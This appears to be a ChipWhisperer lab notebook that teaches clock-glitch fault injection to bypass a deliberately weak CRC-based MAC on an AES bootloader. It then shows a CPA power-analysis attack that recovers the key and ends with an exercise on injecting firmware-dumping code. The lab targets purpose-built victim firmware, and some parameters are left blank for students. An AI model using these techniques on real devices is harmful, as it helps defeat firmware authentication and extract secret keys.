# Part 1, Topic 4: Authenticated AES Bootloader

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *In the previous lab, we saw how glitching might be used to get a bootloader to dump its entire memory by glitching its response to a command.*

*In this lab, we'll again be targeting a bootloader. This time, however, we have a different objective. Instead of trying to read firmware, we'll be trying to bypass the target's authentication in order to upload our own firmware.*

**LEARNING OUTCOMES:**

* Using glitching to bypass authentication of a bootloader command
* Performing a CPA attack using only traces that bypassed authentication

**Prerequisites**
This lab requires you to do a CPA attack on the bootloader. If you haven't yet, it's recommended that you run through SCA101 before attempting this lab.

## Target Bootloader

Throughout SCA101 (and even SCA201), we've focused exclusively on unauthenticated encryption. In real systems, this is often a very bad idea. If you're interested, the following blog post outlines some basic attacks on unauthenticated encryption: https://cybergibbons.com/reverse-engineering-2/why-is-unauthenticated-encryption-insecure/.

For our bootloader example, it would be catastrophic if we were able to modify the resulting firmware. We could then, for example, inject malicious code to dump out the firmware or encryption key. To try to prevent this, our target appends a message authentication code to each encrypted frame in an [Encrypt-then-MAC scheme](https://en.wikipedia.org/wiki/Authenticated_encryption#Encrypt-then-MAC). To keep things simple, the "hash function" is just an 8-bit CRC. When calculating the MAC (Message Authentication Code), the ciphertext is appended to a 64-bit key. Note  that this scheme is **not** secure; however, it is simple and it lets us reuse code from other parts of ChipWhisperer. In total, the whole frame this looks like:

* 16 bytes of encrypted (AES128-CBC) firmware
* 1 byte MAC

The frame is then wrapped in our standard SimpleSerial packet we'll be using the 'p' command (or 0x01 on SSV2) to send 
a frame to the target.

To start, setup the hardware as usual:

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'
SS_VER = 'SS_VER_2_1'

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

In [ ]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../hardware/victims/firmware/simpleserial-aes-bootloader
make PLATFORM=$1 CRYPTO_TARGET=TINYAES128C SS_VER=$2

In [ ]:
fw_path = "../../../hardware/victims/firmware/simpleserial-aes-bootloader/simpleserial-bootloader-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)
target.reset_comms()

We can pull in the CRC calculation from the SimpleSerial2 class:

In [ ]:
calc_crc = cw.targets.SimpleSerial2._calc_crc

In [ ]:
print(calc_crc([0x00, 0x12]))

def bootloader_calc_crc(buf):
    mac_key = [0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6]
    crc_buf = bytearray(mac_key)
    crc_buf.extend(buf)
    return calc_crc(crc_buf)

In [ ]:
ktp = cw.ktp.Basic()
key, text = ktp.next()

print(bootloader_calc_crc(text))

We'll probably crash the target a few times while we're trying some glitching. Create a function to reset the target:

In [ ]:
if PLATFORM == "CWLITEXMEGA":
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
        
        target.reset_comms()
        
        target.simpleserial_write(0x00, bytearray(range(16)))
        target.simpleserial_wait_ack()
else:
    def reboot_flush():            
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = "high_z"
        time.sleep(0.05)
        #Flush garbage too
        target.flush()
        target.reset_comms()
        target.simpleserial_write(0x00, bytearray(range(16)))
        target.simpleserial_wait_ack()

We want to catch both the MAC calculation and the beginning of AES, so we'll set `adc.samples` to its max:

In [ ]:
scope.adc.samples = 24400
scope.adc.offset = 0

## Communication

To start off, we need to inititalize the bootloader with an IV:

In [ ]:
target.simpleserial_write(0x00, bytearray(range(16)))
target.simpleserial_wait_ack()

The bootloader protects against rewriting the IV, so if you rerun the block above the target won't update the IV and it'll return `0x12` as an error code.

Let's start by seeing what the power traces for a correctly authenticated message:

In [ ]:
#Do glitch loop
key, text = ktp.next()
text.extend([bootloader_calc_crc(text)])
scope.arm()
target.simpleserial_write("p", text)
scope.capture()
val = target.simpleserial_wait_ack() # For loop check

#print(bytearray(val['full_response'].encode('latin-1')))
print(val)
cw.plot(scope.get_last_trace())

and an incorrectly authenticated one:

In [ ]:
#Do glitch loop
key, text = ktp.next()
text.extend([0x00])
scope.arm()
target.simpleserial_write("p", text)
scope.capture()
val = target.simpleserial_wait_ack()#For loop check

#print(bytearray(val['full_response'].encode('latin-1')))
print(val)
cw.plot(scope.get_last_trace())

As you can see, the target only decrypts our message if it's got the right MAC. If the target didn't tell us that our MAC was wrong, we could use to help this determine if we got our glitch or not.

Next, we need to setup our glitch. By this point, you should have some fairly reliable settings you can use:

In [ ]:
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["ext_offset"])

In [ ]:
gc.display_stats()

In [ ]:
if scope._is_husky:
    scope.glitch.enabled = True

scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"
scope.glitch.repeat = 1
scope.glitch.width = ???
scope.glitch.offset = ???
scope.io.hs2 = "glitch"
print(scope.glitch)

We might get some "successful" glitches here that don't actually bypass the authentication. Therefore, let's get say 10 or so potentially successful glitches then check them afterwards for a good offset.

In [ ]:
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import trange
import struct

scope.glitch.ext_offset = 2

gc.set_range("ext_offset", ???, ???)
gc.set_global_step([1])
scope.glitch.repeat = 1

scope.adc.timeout = 0.1

reboot_flush()
target.reset_comms()
x = []
req_enc = 10
encs = 0

project = cw.create_project("projects/test_bootloader", overwrite=True)

while encs < req_enc:
    for glitch_setting in gc.glitch_values():

        # optional: you can speed up the loop by checking if the trigger never went low
        #           (the target never called trigger_low();) via scope.adc.state
        scope.glitch.ext_offset = glitch_setting[0]
        if scope.adc.state:
            # can detect crash here (fast) before timing out (slow)
            print("Trigger still high!")
            gc.add("reset", [scope.glitch.ext_offset])
            reboot_flush()
            target.reset_comms()

        #Do glitch loop
        key, text = ktp.next()
        cpy_text = bytearray(text)
        text.extend([0x00])
        scope.arm()
        target.simpleserial_write("p", text)
        ret = scope.capture()
        val = target.simpleserial_read('e', 1, ack=False)
        #print(val)

        if ret: #here the trigger never went high - sometimes the target is still crashed from a previous glitch
            print("Timeout - no trigger")
            gc.add("reset", [scope.glitch.ext_offset])

            #Device is slow to boot?
            reboot_flush()
            target.reset_comms()
        else:
            if val is None: # change this to detect an invalid response
                gc.add("reset", [scope.glitch.ext_offset])
            else:
                # gcnt is the loop counter
                gcnt = val[0]

                if gcnt == ???: #normal response
                    gc.add("normal", [scope.glitch.ext_offset])
                elif gcnt == ???: #glitch!!!
                    gc.add("success", [scope.glitch.ext_offset])
                    print(f"Loc: {scope.glitch.ext_offset}, Glitch number: {encs}")
                    x.append(scope.get_last_trace())
                    trace = cw.Trace(scope.get_last_trace(), cpy_text, key, key)
                    project.traces.append(trace)
                    encs += 1


Let's plot these glitches:

In [ ]:
plot = cw.plot([])
for y in x[:]:
    plot += cw.plot(y)
plot

Hopefully you got at least one glitch that looks like the authenticated version of the encryption. We were able to use the return message to narrow down our glitches, but these other glitches shows that power traces are still very useful here.

Now that we know where to insert a glitch to bypass the authentication, we could use one of those attacks on unauthenticated encryption. Instead, let's do a CPA attack. That way, we'll be able to insert as much code without the limitations of those other attacks. Start by finding an offset that bypasses the authentication:

In [ ]:
cw.plot(x[???])

Next, let's repeat the attack, with the objective this time being to gather enough encryptions to recover the key:

In [ ]:
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import trange
import struct

gc.set_global_step([1])
scope.glitch.repeat = 1

scope.adc.timeout = 0.1

reboot_flush()
target.reset_comms()
x = []
req_enc = 50
scope.adc.offset = 10000
encs = 0

project = cw.create_project("projects/test_bootloader", overwrite=True)

while encs < req_enc:

    # optional: you can speed up the loop by checking if the trigger never went low
    #           (the target never called trigger_low();) via scope.adc.state
    scope.glitch.ext_offset = ???
    if scope.adc.state:
        # can detect crash here (fast) before timing out (slow)
        print("Trigger still high!")
        gc.add("reset", [scope.glitch.ext_offset])
        reboot_flush()
        target.reset_comms()

    #Do glitch loop
    key, text = ktp.next()
    cpy_text = bytearray(text)
    text.extend([0x00])
    scope.arm()
    target.simpleserial_write("p", text)
    ret = scope.capture()
    val = target.simpleserial_read('e', 1, ack=False)
    #print(val)

    if ret: #here the trigger never went high - sometimes the target is still crashed from a previous glitch
        print("Timeout - no trigger")
        gc.add("reset", [scope.glitch.ext_offset])

        #Device is slow to boot?
        reboot_flush()
        target.reset_comms()
    else:
        if val is None: # change this to detect an invalid response
            gc.add("reset", [scope.glitch.ext_offset])
        else:
            # gcnt is the loop counter
            gcnt = val[0]

            if gcnt == ???: #normal response
                gc.add("normal", [scope.glitch.ext_offset])
            else: #glitch!!!
                gc.add("success", [scope.glitch.ext_offset])
                print(scope.glitch.ext_offset)
                print(encs)
                x.append(scope.get_last_trace())
                trace = cw.Trace(scope.get_last_trace(), cpy_text, key, key)
                project.traces.append(trace)
                encs += 1


Let's do a sanity check to make sure these traces all have encryptions (this will take a while to plot so you might only want to plot a subset of the traces)

In [ ]:
project.save()

In [ ]:
plot = cw.plot([])
for y in x:
    plot *= cw.plot(y)
plot

AES decryption and encryption are actually very similar, except with all the forward function replaced with inverse functions. For example, instead of the SBox, we have the inverse SBox, instead of MixColumns we have inverse MixColumns, etc. As such our attack will use the inverse SBox instead of the regular SBox (though we'll use the alternate model so the correct key gets highlighted in the table):

In [ ]:
import chipwhisperer as cw
project = cw.open_project("projects/test_bootloader")

In [ ]:
import chipwhisperer.analyzer as cwa
leak_model = cwa.leakage_models.inverse_sbox_output_alt
attack = cwa.cpa(project, leak_model)
results = attack.run(cwa.get_jupyter_callback(attack))

This won't actually recover our usual encryption key. Instead we've got the last round key. We can use ChipWhisperer to convert it back to the original key:

In [ ]:
bytearray(cwa.aes_funcs.key_schedule_rounds(results.key_guess(), 10, 0))

And we can see it's our usual 0x2b7e... key.

## Injecting Malicious (Advanced)

Now that we can both bypass the MAC, as well as encrypt messages, try creating a piece of malicious code to dump firmware. Following commands will be useful:

1. `set_addr()` sets the address to write to
1. `go()` will run code pointed to by `set_addr()`

In [ ]:
scope.dis()
target.dis()